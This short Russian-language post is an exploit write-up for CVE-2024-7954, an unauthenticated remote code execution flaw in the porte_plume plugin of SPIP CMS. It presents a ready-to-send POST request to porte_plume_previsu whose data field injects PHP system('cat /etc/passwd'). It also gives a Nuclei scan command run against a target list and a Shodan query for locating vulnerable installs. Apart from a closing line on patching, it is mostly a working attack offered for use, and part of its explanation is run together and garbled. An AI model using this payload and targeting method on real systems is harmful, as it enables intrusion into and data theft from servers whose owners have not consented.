
Эксплойт для CVE-2024-7954: удаленное выполнение кода в плагине porte_plume CMS SPIP. Включает шаблон сканирования Nuclei и dork-запрос Shodan для идентификации уязвимых экземпляров.
Плагин porte_plume, используемый в версиях SPIP до 4.30-alpha2, 4.2.13 и 4.1.16, подвержен критической уязвимости удаленного выполнения кода (RCE). Эта ошибка позволяет удаленному неаутентифицированному злоумышленнику выполнить произвольный PHP-код от имени пользователя SPIP, отправив специально сформированный HTTP-запрос. Потенциал эксплуатации серьезен: злоумышленники могут выполнять вредоносные команды на сервере, что может привести к несанкционированному доступу, утечке данных или дальнейшей компрометации системы.
##Nuclei Scan
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
Пример специально сформированного HTTP-запроса, который можно использовать для эксплуатации этой уязвимости:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST направлен к действию porte_plume_previsu файла index.php SPIP.system() для выполнения команды (в данном случае cat /etc/passwd), которая читает содержимое файла паролей.system(), злоумышленник может выполнить любой PHP-код на сервере, что приведет к серьезным последствиям.Для выявления потенциально уязвимых установок SPIP можно использовать следующий поисковый запрос Shodan:
app="SPIP"
Эта уязвимость подчеркивает важность своевременного обновления программного обеспечения и внедрения надежных мер безопасности для защиты от эксплуатации.